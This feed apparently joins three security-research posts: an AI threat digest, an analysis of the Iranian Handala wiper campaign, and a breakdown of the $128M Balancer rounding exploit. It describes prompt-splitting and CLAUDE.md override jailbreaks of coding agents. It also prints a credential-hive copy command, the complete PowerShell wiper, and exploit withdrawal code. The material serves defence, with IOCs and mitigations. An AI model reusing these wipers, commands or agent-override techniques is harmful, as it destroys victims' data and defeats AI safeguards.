Visualização de leitura

AI Threat Landscape Digest January-February 2026

KEY FINDINGS

AI-assisted malware development has reached operational maturity.
VoidLink framework, which is modular, professionally engineered, and fully functional, was built by a single developer using a commercial AI-powered IDE within a compressed timeframe. AI-assisted development is no longer experimental but produces deployment ready output.

AI-assisted development is not always obvious from the final product.
VoidLink was initially assessed as the work of a coordinated team based on its architecture and implementation quality. The development method was exposed not from analyzing the malware but through an operational security failure. AI-assisted development should be considered a possibility from the outset, not as an afterthought.

Adoption of self-hosted, open-source AI models is growing but still limited in practice.
Actors of varying skill levels are investing in self-hosted and unrestricted models to avoid commercial platform restrictions. However, underground discussions consistently reveal a gap between aspiration and capability: local models still underperform, finetuning remains aspirational, and commercial models remain the productive choice even for actors with explicit malicious intent.

Jailbreaking is shifting from direct prompt engineering toward agenticarchitecture abuse.
Traditional copy-paste jailbreaks are increasingly ineffective. The misuse of AI agent configuration mechanisms, specifically project files that redefine agent behavior, is a more significant development as it represents a qualitative shift from manipulating a
model’s responses to abusing its operational architecture.

AI is showing early signs of deployment as a real-time operational component. Beyond its use as a development aid, AI is beginning to appear as a live element in offensive workflows as autonomous agents performing security research tasks, and
LLMs classifying and engaging targets at scale within automated pipelines.

Enterprise AI adoption is itself an expanding attack surface.
GenAI activity across enterprise networks shows that one in every 31 prompts risked sensitive data leakage, impacting 90% of GenAI-adopting organizations.

INTRODUCTION

During January-February 2026, cyber crime ecosystems continue to adopt AI in a widespread but uneven pattern. Throughout 2025, legitimate software development began shifting from promptbased AI assistance to agent-based development. Tools such as Cursor, GitHub Copilot, Claude Code, and TRAE introduced a common paradigm: developers write structured specifications in markdown files, and AI agents autonomously implement, test, and iterate code based on those instructions. This agentic model, in which markdown is the operative control layer, is now starting to appear across the threat landscape.


The critical differentiator in what we observed is AI methodology combined with domain expertise. Across cyber crime forums, the dominant pattern of AI use remains unstructured prompting: actors request malware or exploit code from AI models as if entering a query in a search engine. VoidLink (detailed below) on the other hand, is the first documented case of AI producing truly advanced, deploymentready malware. The developer combined deep security knowledge with a disciplined, spec-driven
workflow to produce results indistinguishable from professional team-based engineering. Forum activity, which constitutes the bulk of observable evidence, primarily consists of actors who have not yet adopted structured AI workflows and whose efforts remain relatively unsophisticated. The more capable actors, those who combine domain expertise with disciplined AI methodology, leave far fewer traces in open forums, making the true scope of this shift harder to measure.

VOIDLINK: THE STANDARD WE MEASURE AGAINST

In January 2026, Check Point Research (CPR) exposed VoidLink, a Linux-based malware framework featuring modular command-and-control (C2) architecture, eBPF and LKM rootkits, cloud and container enumeration, and more than 30 post-exploitation plugins. The framework is highly sophisticated and professionally engineered, so much so that the initial assessment was that VoidLink was likely the product of a coordinated, multi-person development effort conducted over months of intensive development.


Operational security (OPSEC) failures by the developer later exposed internal development artifacts that told a different story. These materials revealed that VoidLink was authored by a single developer using TRAE SOLO, the paid tier of ByteDance’s commercial AI-powered IDE. Instead of unstructured prompting, the developer used Spec Driven Development (SDD), a disciplined engineering workflow, to first define the project goals and constraints, and then use an AI agent to generate a comprehensive architecture and development plan across three virtual teams (Core, Arsenal, and Backend). The resulting plan included sprint schedules, feature breakdowns, coding standards, and acceptance criteria, all documented as structured markdown files. The AI agent implemented the framework sprint by sprint, with each sprint producing working, testable code. The developer acted as product owner, directing, reviewing, and refining, while the AI agent did the actual work.


The results were striking. The recovered source code aligned so closely with the specification documents that it left little doubt that the codebase was written to those exact instructions. What normally would have been a 30-week engineering effort across three teams was executed in under a week, producing over 88,000 lines of functional code. VoidLink reached its first functional implant around December 4, 2025, one week after development began.

THIS CASE ESTABLISHES TWO PRINCIPLES:

  • AI-assisted development now produces operationally viable, deployment-ready malware: it has crossed the threshold from experimental to functional.
  • The AI involvement was invisible until it was exposed by an unrelated OPSEC failure. For analysts and defenders, this means AI involvement in malware development should be treated as a default working assumption, even when there are no visible indicators

The ramifications of VoidLink’s methodology go beyond this individual case. Its workflow, in which structured markdown specifications direct an AI agent to autonomously implement, test, and iterate, is the same paradigm that defined the agentic AI revolution in legitimate software development throughout 2025. The cyber crime ecosystem is not developing its own AI capability. It is adopting the same tools and architectural patterns as legitimate technology, with the additional goal of trying to overcome the protective limitations built into these systems. This is more important than which model or platform the attackers use.

The same architectural pattern repeatedly appears across the cases highlighted in our report: markdown skill files that transform a coding agent into an autonomous offensive security operator, and configuration files abused to override agent safety controls. In each case, the operative control layer is not code but structured documentation that determines what the AI agents build, how they behave, and what constraints they observe or ignore. This is in direct contrast to the underground forum activity, where the dominant approach remains unstructured prompting.

MODELS: COMMERCIAL, SELF-HOSTED, AND INFORMAL SERVICES

SELF-HOSTED OPEN-SOURCE MODELS

Across cyber crime forums, actors at all skill levels are actively exploring self-hosted, open-source AI models as alternatives to commercial platforms. Their motivations are consistent: to avoid moderation, prevent account bans, and maintain operational privacy.

Users with malware and hacking backgrounds are installing uncensored model variants such as wizardlm-33b-v1.0-uncensored and openhermes-2.5-mistral, and prompt them with comprehensive malicious wishlists spanning ransomware, keyloggers, phishing kits, and exploit code.

Figure 1 – User installing local LLM variants and prompting them to generate malware and fraud tooling.

More established actors are conducting structured cost-benefit analyses, evaluating not only hardware requirements and GPU costs but whether locally hosted models produce reliable output (or hallucinate to the point of being operationally useless), and whether AI-generated malware meets the quality bar of current evasion techniques.

Figure 2 – Threat actor inquiry into hardware, cost, and feasibility of running a fully “unrestricted” locally hosted model.

SELF-HOSTED MODELS: LIMITATIONS IN PRACTICE

Self-hosted models consistently show a gap between aspiration and capability. Community advice on improving local model output focuses on basic optimizations, such as switching to English-language prompts and increasing quantization levels, while references to more advanced techniques such as LoRA fine-tuning remain aspirational rather than operational.

Figure 3 – Community feedback suggesting alternative local models and highlighting token/context limitations of smaller deployments.

Cost estimates range from $5,000 to $50,000 depending on the desired performance, with training timelines of 3–12 months and frank admissions that models “hallucinate a lot” without extensive investment.

Figure 4 – Discussion on cost and requirements for locally hosted unrestricted models.

Most tellingly, an active offensive tools vendor, advertising C2 setups, EDR bypass services, and red team tooling, concluded that local deployment is currently “more of a burden than something productive,” while acknowledging that commercial models remain useful despite increasing restrictions.

Figure 5 – Participants comparing commercial AI systems with alternative models and discussing perceived restriction levels.

COMMERCIAL PLATFORMS AND INFORMAL ACCESS SHARING

Rather than migrating to self-hosted infrastructure, users are comparing what the prevailing workarounds among commercial models provide. Participants recommended specific providers they view as less restrictive, shared experiences with account enforcement on multiple platforms, and refined prompt-splitting techniques to incrementally bypass safeguards, such as requesting explanations before progressing toward executable code.

Figure 6 – Example of the structured prompt-splitting technique suggested to incrementally bypass AI safety restrictions.

Some early signs of informal access sharing have been observed, with operators of local models offering to generate restricted outputs for others on request. However, given the historical precedent of “dark LLM” services that largely failed to deliver on their promises, it remains to be seen whether these will develop into durable service models.

Figure 7 – Community member offering private generation of restricted output via locally hosted model infrastructure.

JAILBREAKING AS ARCHITECTURAL ABUSE

Traditional jailbreaking, the practice of circulating copy‑paste prompts designed to trick models into producing restricted output, is becoming increasingly difficult to utilize. In some forum discussions, users seeking Claude jailbreaks were told that easy public prompts are no longer available, platforms have been cracking down on abusers, dedicated subreddits have been banned, and developing new jailbreaks is costly because the accounts are eventually terminated. Single‑prompt jailbreaking is becoming less attractive as model providers invest in safety enforcement.

Figure 8 – Forum discussion highlighting the declining availability of easy public jailbreak prompts.

ABUSING AGENT ARCHITECTURE

A more significant development is the emergence of jailbreaking techniques that target the architecture of AI agent systems rather than the model’s conversational safeguards. A packaged “Claude Code Jailbreak” distributed on forums illustrates this shift.

Claude Code is designed to read a CLAUDE.md file from a project’s root directory as configuration. Legitimate developers use this mechanism to define the project context, coding standards, and agent behavior. The jailbreak abuses this by placing override instructions in the CLAUDE.md file that suppresses safety controls and redefines the agent’s role. When Claude Code initializes in the directory, it reads these instructions as authoritative project configuration and follows them. The screenshots below claim successful generation of a RAT (Remote Access Trojan) using this method.

Figure 9 – Packaged Claude Code jailbreak exploiting the CLAUDE.md project configuration mechanism.
Figure 10 – Alleged jailbreak output showing generation of remote access malware code.

This is not prompt injection in the traditional sense, but manipulation of the agent’s instruction hierarchy, the same architecture used for agentic AI tools in legitimate development. The CLAUDE. md file occupies the same functional role as VoidLink’s markdown specification files or RAPTOR’s skill definitions: a structured document that determines what the agent does, how it behaves, and what constraints it observes.

FROM DEVELOPMENT TOOL TO OPERATIONAL AGENT

The preceding sections document AI as a development aid (as seen by VoidLink), a resource actors struggle to access on their own terms (self-hosted models), and as a system whose restrictions they attempt to bypass (jailbreaking). Now let’s look at AI deployed as a real-time operational component, performing offensive tasks autonomously within live workflows.

RAPTOR: AGENT-BASED OFFENSIVE ARCHITECTURE VIA MARKDOWN SKILLS

RAPTOR is a legitimate, open-source security research framework created by established security researchers and published on GitHub under an MIT license. It is not malicious tooling. Its significance for threat intelligence lies in its architectural pattern, and that criminal communities are paying attention.

RAPTOR transforms Claude Code into an autonomous offensive security agent through a set of markdown skill files and agent definitions. The framework integrates static analysis, fuzzing, exploit generation, and vulnerability triage into an agentic pipeline orchestrated entirely through structured markdown instructions, with no compiled tooling required. In its most explicit form, it demonstrates what the agentic paradigm makes possible: a set of text files that turn a general‑purpose coding agent into a specialized offensive security operator.

Figure 11 – RAPTOR documentation highlighting offensive security agent capabilities and exploit generation benchmarks across LLM providers.

RAPTOR’s own data provides an additional data point on the commercial versus self-hosted question we discussed earlier. An evaluation of exploit generation across multiple model providers found that commercial frontier models (Anthropic Claude, OpenAI GPT-4, and Google Gemini) consistently produce compilable C code at approximately $0.03 per vulnerability, while locally hosted models via Ollama were marked as “often broken” and unreliable for exploit generation. This reinforces the conclusion reached independently by experienced actors in underground forums: commercial models remain significantly more capable than self-hosted alternatives for operational tasks.

Figure 12 – Forum post sharing RAPTOR as an autonomous offensive and defensive security framework built on Claude Code.

Discussions on criminal forums indicate that threat actors are aware of this architecture. The combination of a proven architectural pattern, open source availability, and documented criminal interest suggests that similar configurations, whether directly based on RAPTOR or just replicating its approach, are likely being developed and tested privately.

AI AS ATTACK SURFACE: ENTERPRISE EXPOSURE

The preceding sections document how threat actors engage with AI as an offensive tool. But the same wave of AI adoption is simultaneously creating exposure from the defensive side. As enterprises integrate generative AI into daily workflows, the volume of sensitive data flowing through these tools introduces a distinct category of risk: instead of AI weaponized against organizations, AI is adopted by organizations in ways that outpace security controls.

In January – February 2026, corporate use of generative AI tools continued to expand at scale. Analysis of GenAI activity across enterprise networks shows that one in every 31 prompts (approximately 3.2%) posed a high risk of sensitive data leakage, including the potential sharing of confidential business information, regulated data, source code, or other sensitive corporate content with external GenAI services.

Critically, this risk is broadly distributed across the enterprise landscape rather than limited to a small number of outliers. High-risk prompt activity impacted 90% of organizations that use GenAI tools on a regular basis, indicating that nearly all GenAI-adopting enterprises encounter meaningful data leakage risk through everyday AI usage. Beyond these clearly high-risk events,16% of prompts contained potentially sensitive information, reflecting a wider pattern of questionable data-handling behavior that can still translate into compliance exposure or IP loss.

Adoption trends further amplify the challenge. Over the last couple of months, organizations used 10 different GenAI tools on average, reflecting multi-tool environments. At the user level, an average employee generated 69 GenAI prompts per month. As prompt volume grows, the possibility of data exposure events scales accordingly, reinforcing the need for security policies, visibility, and real-time prevention controls.

The post AI Threat Landscape Digest January-February 2026 appeared first on Check Point Research.

“Handala Hack” – Unveiling Group’s Modus Operandi

Key Findings

  • Handala Hack is an online persona operated by Void Manticore (aka Red Sandstorm, Banished Kitten), an actor affiliated with Iranian Ministry of Intelligence and Security (MOIS)
  • Additional personas associated with this actor include Karma and Homeland Justice, which have been used in targeted operations against Israel and Albania
  • Handala continues to rely on longstanding TTPs, primarily conducting quick, hands-on activity within victim networks and employing multiple wiping methods simultaneously
  • In parallel, some newly observed TTPs include the deployment of NetBird to tunnel traffic into the network, as well as the use of an AI-assisted PowerShell script for wiping activity

Introduction

Handala Hack, also tracked by Check Point Research as Void Manticore, is an Iranian threat actor that is known for multiple destructive wiping attacks combined with “hack and leak” operations. The threat actor operates several online personas, with the most prominent among them being Homeland Justice, maintained from mid-2022 specifically for multiple attacks against government, telecom, and other sectors in Albania, as well as Handala Hack, which has been responsible for multiple intrusions in Israel and recently expanding its targeting to US-based enterprises such as medical technology giant Stryker.

The techniques, tactics, and procedures (TTPs) associated with Void Manticore intrusions remained largely consistent throughout 2024 to 2026, as the group continued to rely primarily on manual, hands-on operations, off-the-shelf wipers, and publicly available deletion and encryption tools. Accordingly, our previous research on the actor, published in early 2025, remains highly relevant to understanding their activity. Void Manticore has historically used both custom-built and publicly available tools, while also relying on underground criminal services to obtain initial access and malware.

As the group’s operations expanded in scope, with recent attacks targeting U.S. organizations, we decided to share our observations on this cluster’s activity, with a particular focus on recent TTPs and newly identified indicators. Because the group operates primarily through manual, hands-on activity, its indicators tend to be short-lived and consist largely of commercial VPN services, open-source software, and publicly available offensive security tools.

Background

“Handala Hack” is an online persona operated by Void Manticore (Red Sandstorm, Banished Kitten), a MOIS-affiliated threat actor, and appears to draw its name and imagery from the Palestinian cartoon character Handala. The persona has been used extensively since late 2023 and represents one of the group’s three primary operational fronts. The other two are Karma, which was likely completely replaced by Handala, and Homeland Justice, a persona the group continues to use in operations targeting Albania.

Logos of Void Manticore personas (from left to right): Homeland Justice, Handala and Karma.
Figure 1 – Logos of Void Manticore personas (from left to right): Homeland Justice, Handala and Karma.

Based on our observations, intrusions linked to all three personas exhibit highly similar TTPs, as well as code overlaps in the wipers they deploy. Another distinctive characteristic shared by Karma and “Homeland Justice” is the collaboration with Scarred Manticore, a separate Iranian threat actor. In the case of Handala and Karma, we have also observed incidents in which the victim-facing group (i.e., messaging within the wipers, notes left in a compromised environment) was presented as Karma, while the stolen data was ultimately leaked through Handala.

Operational interconnections of Void Manticore
Figure 2 – Operational interconnections of Void Manticore

One possible explanation is that Karma and Handala initially represented two separate teams or operational efforts within the same organization, but later converged under a single brand. This would be consistent with Karma’s complete disappearance and Handala’s emergence as the dominant public-facing persona.

According to public reporting, Void Manticore overlaps with activity linked to the MOIS Internal Security Deputy, particularly its Counter-Terrorism (CT) Division, operating under the supervision of Seyed Yahya Hosseini Panjaki. Panjaki was reportedly killed in the opening phase of Israel’s strikes on Iran in early March 2026.

Initial Access

Supply Chain Attacks

Handala has consistently targeted IT and service providers in an effort to obtain credentials, relying largely on compromised VPN accounts for initial access. Throughout the last months, we identified hundreds of logon and brute-force attempts against organizational VPN infrastructure linked to Handala-associated infrastructure. This activity typically originates from commercial VPN nodes and is frequently tied to default hostnames in the format DESKTOP-XXXXXX OR WIN-XXXXXX.

After the internet shutdown in Iran in January, we observed similar activity originating from Starlink IP ranges, and it has continued since. This has occurred in parallel with a decline in the actor’s operational security, as the group has also begun connecting directly to victims from Iranian IP addresses.

Previously, the adversary generally maintained stronger operational discipline, typically egressing through the commercial VPN segment 169.150.227.X while operating against targets in Israel. In some cases, however, the VPN connection failed, exposing communications from Iranian IP addresses or from a virtual private server. Since the start of the war, the actor has struggled to maintain this level of operational security. At times, it successfully egressed through an Israeli node, 146.185.219[.]235, assessed to be linked to a VPN service, although this differed from the segment previously used.

Activity Before Impact

In a recent intrusion attributed to Handala, initial access is believed to have been established well before the destructive phase, with network access dating back several months. This earlier activity likely provided the group with persistent access and the Domain Administrator credentials required to carry out the attack. In the hours leading up to the destructive activity, Handala appeared to validate its access and test authentication using the compromised credentials.

It is unclear whether this activity is directly associated with Handala, as it slightly differs from their typical TTPs. The actor disabled Windows Defender protections and executed multiple reconnaissance and credential-theft operations. Shortly afterwards, the attacker attempted to retrieve an additional payload from a dedicated command-and-control server (107.189.19[.]52).

The adversary then proceeded with credential extraction using multiple techniques. These included dumping the LSASS process using comsvcs.dll via rundll32.exe, as well as exporting sensitive registry hives such as HKLM. In parallel, the attacker executed ADRecon (named dra.ps1), a PowerShell-based reconnaissance framework used to enumerate Active Directory environments. At this point, it likely achieved Domain Admin credentials used in “Handala”s wiping attack.

wmic.exe /node:[REDACTED_HOSTNAME] /user:[REDACTED] /password:[REDACTED] process call create "cmd.exe /c   copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system  c:\users\public”

Lateral Movement

Handala is known to operate primarily in a manual, hands-on manner, with lateral movement conducted largely through extensive use of RDP to move between systems within a compromised environment. To reach hosts that were not directly accessible from outside the network, the group was observed deploying NetBird, a platform designed to create secure, private zero-trust mesh networks.

The deployment of NetBird was performed manually. The attackers first connected to compromised hosts via RDP and then used the local web browser to download the software directly from the official NetBird website.

By installing NetBird on multiple machines within the environment, the attackers were able to establish internal connectivity between systems and operate more efficiently. This approach enabled them to accelerate destructive activity while maintaining control of the operation from multiple footholds inside the network. During the incident, we observed at least five distinct attacker-controlled machines operating simultaneously within the environment.

Wiping Operations

During the destructive phase of the attack, we observed the group deploying four distinct wiping techniques in parallel, likely to maximize impact and inflict the greatest possible damage. To further increase the effect, the threat actor used Group Policy to distribute the different wipers across the network.

Handala Wiper

The first stage involved the deployment of a custom wiper, referred to as Handala Wiper (in some instances named handala.exe).

The wiper was distributed across the network as a scheduled task using Group Policy logon scripts, which executed a batch file named handala.bat. This script simply triggered the execution of two wiper components – the executable and the PowerShell script. Notably, the executable itself was launched remotely from the Domain Controller (DC) and was not written to disk on the affected machines. The malware overwrites file contents across the system and additionally leverages MBR-based wiping techniques to corrupt or destroy files on the system, contributing to significant data loss.

Figure 3 – Wiper execution of Handala Wiper

Handala PowerShell Wiper

As a final stage of the destructive operation, the attackers deployed an additional custom PowerShell-based wiper. Similar to the previous component, this script was also distributed through Group Policy logon scripts, allowing it to propagate across multiple systems within the network.

The PowerShell wiper performs a straightforward but effective operation: it enumerates all files within users directories and deletes them, further compounding the damage caused by the initial wiping activity. Based on the code structure and the detailed comments, it is likely that this PowerShell script was developed with AI assistance.

$usersFolder = C:\Users
 
# Ensure the folder exists
if (Test-Path $usersFolder) {
    # Get all items in C:\Users, but not the Users folder itself
    $items = Get-ChildItem -Path $usersFolder -Recurse
 
    # Remove each item (files and subfolders) inside C:\Users
    foreach ($item in $items) {
        try {
            Remove-Item -Path $item.FullName -Recurse -Force -ErrorAction Stop
        } catch {
            Write-Host Could not delete: $($item.FullName)
        }
    }
}
 
 
 
$sourceFile = \\[REDACTED]\SYSVOL\[REDACTED]\scripts\Administtration\install\handala.rar
$destinationFolder = C:\users
 
 
if (!(Test-Path $destinationFolder)) {
    New-Item -ItemType Directory -Path $destinationFolder | Out-Null
}
 
$driveLetter = (Split-Path $destinationFolder -Qualifier).TrimEnd(':','\')
 
$i = 0
 
while ((Get-PSDrive $driveLetter).Free -gt (Get-Item $sourceFile).Length) {
    Copy-Item $sourceFile $destinationFolder\Handala_$i.gif
    $i++
}

Use of Disk Encryption for Destruction

In addition to the custom wiping tools, we observed the attackers attempting to leverage VeraCrypt, a legitimate and widely used disk encryption utility. In this case, the attacker connected to the compromised host via RDP and used the system’s default web browser to download the software directly from the official website. By encrypting the system drives using a legitimate tool, the attackers added an additional layer to the destructive process. This technique not only increases the operational impact but can also complicate recovery efforts, as encrypted disks may remain inaccessible even if other wiping components fail or are only partially successful.

Manual Deletion

In some cases, Handala Hack operators manually delete virtual machines directly from the virtualization platform or files from compromised machines. This straightforward process involves logging in via RDP, selecting all files, and deleting them. We observed this behavior in several incidents, and it is also documented in Handala Hack’s own videos and leaked materials.

Summary

In this report, we detailed the background of the “Handala Hack” persona and its links to Void Manticore, an actor affiliated with Iran’s Ministry of Intelligence and Security (MOIS). Handala is not the only persona maintained by this actor, which operates several fronts in campaigns targeting the United States, Israel, and Albania.

Like many destructive threat actors, Handala relies on relatively simple TTPs, largely aiming for quick, opportunistic wins through hands-on operations against its targets. These activities include gaining initial access through compromised credentials, moving laterally via RDP and basic tunneling tools, and deploying wipers alongside manual destructive actions. Their modus operandi has not shifted significantly, and strengthening defenses against these techniques remains an effective way to counter this threat.

Recommendations for Defenders

  • Enforce multi-factor authentication, especially for remote access and privileged accounts
  • Monitor for the use of compromised credentials and suspicious authentication activity, with an emphasis on the following:
    • Logins from countries not previously observed for your organization or specific users
    • Unusual access patterns, including:
      • First-time logins outside typical hours
      • Multiple failed logins followed by success
      • New device registrations
      • Unusual data transfer volumes during VPN sessions
      • Authentication from new ASN/hosting providers
    • Restrict access from high-risk geographies and infrastructure
      • Block inbound connections from Iran at the perimeter and on remote access services (VPN/SSO), unless there is a verified business need
      • Block or tightly restrict Starlink IP ranges, given observed abuse in Iranian actor operations
      • If full blocking is not feasible, implement conditional access controls, increased authentication requirements, and enhanced monitoring for these ranges
    • Consider temporarily tightening remote access policies If operationally possible, temporarily restrict VPN connectivity to to business related countries only, with exceptions approved based on business need (e.g., whitelisted users/locations, dedicated jump hosts, or managed devices only).
  • Restrict and harden RDP access across the environment; disable it where not operationally required. Actively search for RDP access from machines with the default Windows naming conventions (i.e DESKTOP-XXXXXX OR WIN-XXXXXXXX), specially outside of working hours
  • Monitor for the use of potentially unwanted software, including remote management and monitoring (RMM) tools, VPN applications such as NetBird, and tunneling utilities such as SSH for windows

IOCs

TypeIOC
Handala Wiper5986ab04dd6b3d259935249741d3eff2
Handala Powershell Wiper3cb9dea916432ffb8784ac36d1f2d3cd
VeraCrypt Installer3236facc7a30df4ba4e57fddfba41ec5
NetBird Installer3dfb151d082df7937b01e2bb6030fe4a
NetBirde035c858c1969cffc1a4978b86e90a30
Handala VPS82.25.35[.]25
Handala VPS31.57.35[.]223
Handala VPS107.189.19[.]52
VPN exit node used by Handala146.185.219[.]235
Starlink IP range used by Handala188.92.255.X
Starlink IP range used by Handala209.198.131.X
Commercial VPN IP range used by Handala149.88.26.X
Commercial VPN IP range used by Handala169.150.227.X
Handala Machine Names
WIN-P1B7V100IIS
DESKTOP-FK1NPHF
DESKTOP-R1FMLQP
WIN-DS6S0HEU0CA
DESKTOP-T3SOB36
WIN-GPPA5GI4QQJ
VULTR-GUEST
DESKTOP-HU45M79
DESKTOP-TNFP4JF
DESKTOP-14O69KQ
DESKTOP-9KG46L1
DESKTOP-G2MH4KD
WIN-DS6S0HEU0CA
WIN-GPPA5GI4QQJ

MITRE ATT&CK Breakdown

ATT&CK TacticTechniqueObserved Activity
Initial AccessT1133 – External Remote ServicesUse of compromised VPN access for entry into victim environments.
Initial AccessT1078.002 – Valid Accounts: Domain AccountsUse of stolen/supplied credentials, including Domain Admin credentials.
Initial AccessT1199 – Trusted RelationshipTargeting of IT and service providers.
Credential AccessT1110 – Brute ForceRepeated logon and brute-force attempts against VPN infrastructure.
Credential AccessT1003.001 – OS Credential Dumping: LSASS MemoryLSASS dumping via rundll32 and comsvcs.dll.
Credential AccessT1003.002 – OS Credential Dumping: Security Account ManagerExport of sensitive registry hives for credential extraction.
DiscoveryT1087.002 – Account Discovery: Domain AccountADRecon used to enumerate the Active Directory environment.
Lateral MovementT1021.001 – Remote Services: Remote Desktop ProtocolExtensive hands-on lateral movement over RDP.
Command and ControlT1572 – Protocol TunnelingNetBird used to tunnel traffic and reach internal hosts.
ExecutionT1105 – Ingress Tool TransferNetBird and VeraCrypt downloaded directly onto victim systems.
ExecutionT1047 – Windows Management InstrumentationWMIC was used to run commands.
Execution / PersistenceT1484.001 – Group Policy ModificationWipers distributed via GPO.
Execution / PersistenceT1037.003 – Network Logon ScriptLogon scripts used to trigger destructive components.
ExecutionT1053.005 – Scheduled TaskHandala wiper launched as a scheduled task.
ExecutionT1059.001 – PowerShellAI-assisted PowerShell wiper used for destructive activity.
ImpactT1561.002 – Disk Structure WipeMBR-based wiping by the custom Handala wiper.
ImpactT1485 – Data DestructionFile deletion, manual deletion, and destructive cleanup.
ImpactT1486 – Data Encrypted for ImpactVeraCrypt used to encrypt disks as part of the attack.

The post “Handala Hack” – Unveiling Group’s Modus Operandi appeared first on Check Point Research.

How an Attacker Drained $128M from Balancer Through Rounding Error Exploitation

By: Dikla Barda, Roaman Zaikin & Oded Vanunu 

On November 3, 2025, Check Point Research’s blockchain monitoring systems detected a sophisticated exploit targeting Balancer V2’s ComposableStablePool contracts. The attacker exploited arithmetic precision loss in pool invariant calculations to drain $128.64 million across six blockchain networks in under 30 minutes.

The attack leveraged a rounding error vulnerability in the _upscaleArray function that, when combined with carefully crafted batchSwap operations, allowed the attacker to artificially suppress BPT (Balancer Pool Token) prices and extract value through repeated arbitrage cycles. The exploitation occurred primarily during attacker smart contract deployment, with the constructor executing 65+ micro-swaps that compounded precision loss to devastating effect.


Introduction

In the early morning hours of November 3, 2025, Check Point’s Blockchain Threat Analysis system flagged unusual activity on the Ethereum mainnet involving Balancer’s V2 Vault contract. Within minutes, our automated detection identified a critical exploit in progress, with massive fund outflows from multiple liquidity pools.

Balancer V2

The attack exploited a mathematical vulnerability in how Balancer’s ComposableStablePools handle small-value swaps. When token balances are pushed to specific rounding boundaries (8-9 wei range), Solidity’s integer division causes significant precision loss. The attacker weaponized this by executing batched swap sequences that accumulated these tiny errors into catastrophic invariant manipulation.


Background: Balancer V2 Architecture

The Vault System

Balancer V2 uses a centralized “Vault” contract (0xBA12222222228d8Ba445958a75a0704d566BF2C8) that holds all tokens across all pools, separating token storage from pool logic to reduce gas costs and enable capital efficiency. This shared liquidity design meant a single vulnerability in pool math could affect all ComposableStablePools simultaneously—exactly what happened in this attack.

Internal Balance Mechanism

Balancer V2’s Internal Balance system allows users to deposit tokens once and use them across multiple operations without repeated ERC20 transfers:

mapping(address => mapping(IERC20 => uint256)) private _internalTokenBalance;

This system became critical to the attack. The exploit contract accumulated stolen funds in its internal balance during deployment, then withdrew them to the final recipient address in subsequent transactions.


The Vulnerability: Arithmetic Precision Loss in Stable Pool Math

The Root Cause

ComposableStablePools use Curve’s StableSwap invariant formula to maintain price stability between similar assets. The invariant D represents total pool value, and BPT price is calculated as D divided by totalSupply. However, the scaling operations that prepare balances for invariant calculations introduce rounding errors.

Vulnerable Code Path:

function _upscaleArray(uint256[] memory amounts, uint256[] memory scalingFactors) 
    private pure returns (uint256[] memory) {
    
    for (uint256 i = 0; i < amounts.length; i++) {
        amounts[i] = FixedPoint.mulDown(amounts[i], scalingFactors[i]);
    }
    return amounts;
}
// Simplified representation - actual implementation is more complex
function _calculateInvariant(uint256[] memory balances) private pure returns (uint256) {
    uint256[] memory scaledBalances = _upscaleArray(balances, scalingFactors);
    uint256 invariant = computeStableInvariant(scaledBalances, amplificationParameter);
    return invariant;
}

The mulDown function performs integer division that rounds down. When balances are small (8-9 wei range), this rounding creates significant relative errors—up to 10% precision loss per operation.

This precision error propagates to the invariant D calculation, causing abnormal reduction in the calculated value. Since BPT price equals D divided by total supply, the reduced D directly lowers BPT price, creating arbitrage opportunities for the attacker.

Individual swaps produce negligible precision loss, but within a single batchSwap transaction containing 65 operations, these losses compound dramatically. The lack of invariant change validation allowed the attacker to systematically suppress BPT price through accumulated precision errors, extracting millions in value per pool

Attack Analysis

The Three Phase Pattern

The attacker executed a sophisticated three-stage swap sequence within single `batchSwap` transactions:

Stage 1: Adjustment to Rounding Boundary

Swap large amounts of BPT for underlying tokens to push one token’s balance to the critical 8-9 wei threshold where rounding errors are maximized.

Stage 2: Trigger Precision Loss

Execute small swaps involving the boundary-positioned token. The _upscaleArray function rounds down during scaling, causing the invariant D to be underestimated and BPT price to drop artificially.

Stage 3: Extract Value

Mint or purchase BPT at the suppressed price, then immediately redeem for underlying assets at full value. The price discrepancy represents pure profit.

This three-phase cycle repeated 65 times within the same batchSwap transaction. All stages occur atomically, preventing intervention and ensuring precision losses accumulate across the shared balance state, ultimately extracting millions from each targeted pool.

Having understood the vulnerability mechanism, let’s examine how the attacker automated this exploitation.

Exploit Contract Architecture

The attacker deployed contract `0x54B53503c0e2173Df29f8da735fBd45Ee8aBa30d` with a three-address operational structure:

– Exploiter 1: 0x506D1f9EFe24f0d47853aDca907EB8d89AE03207 (deployer)

– Exploit Contract: 0x54B53503c0e2173Df29f8da735fBd45Ee8aBa30d

– Exploiter 2: 0xAa760D53541d8390074c61DEFeaba314675b8e3f (recipient)

Constructor-Based Attack

Analysis of transaction 0x6ed07db… revealed the theft occurred during contract deployment. The constructor automatically executed the rounding error exploitation, targeting two Balancer pools simultaneously.

 The constructor generated 65 token transfers to Balancer’s Protocol Fees Collector—these are swap fees collected during the manipulation, not the stolen funds themselves. The transfer amounts display the characteristic pattern of iterative precision exploitation, decreasing from 0.414 osETH down to 0.000000000000000003 osETH as the rounding errors compound to negligible values.

The stolen value appears in InternalBalanceChanged events, which record balance updates within the Vault’s internal accounting system. The exploit contract’s internal balance increased by:

Pool 1 (osETH/wETH-BPT): +4,623 WETH, +6,851 osETH
Pool 2 (wstETH-WETH-BPT): +1,963 WETH, +4,259 wstETH
Combined total: 6,586 WETH (4,623 + 1,963) + 6,851 osETH + 4,259 wstETH

These internal balance increases represent the actual stolen funds. The InternalBalanceChanged events show that the exploit contract’s Vault-internal account was credited with the drained assets. While the underlying tokens physically remained in the Vault contract, the Vault’s accounting system now recognized the exploit contract as the owner of these balances, enabling later withdrawal.

Withdrawal Function

After the constructor accumulated stolen funds, function 0x8a4f75d6 transferred them to Exploiter 2:

function 0x8a4f75d6(address[] calldata targetPools) public {
    require(msg.sender == _callTx);
    
    poolIndex = 0;
    while (poolIndex < targetPools.length) {
        poolId = targetPools[poolIndex].getPoolId();
        (tokens[],) = vault.getPoolTokens(poolId);
        internalBals[] = vault.getInternalBalance(address(this), tokens);
        
        tokenIndex = 0;
        while (tokenIndex < tokens.length) {
            operations[tokenIndex] = UserBalanceOp({
                kind: 1,
                asset: tokens[tokenIndex],
                amount: internalBals[tokenIndex],
                sender: address(this),
                recipient: 0xAa760D53541d8390074c61DEFeaba314675b8e3f
            });
            tokenIndex++;
        }
        
        vault.manageUserBalance(operations);
        poolIndex++;
    }
}

This function withdraws the contract’s own internal balance. The UserBalanceOp has sender equal to the exploit contract address because the contract legitimately owns the funds accumulated during constructor execution.

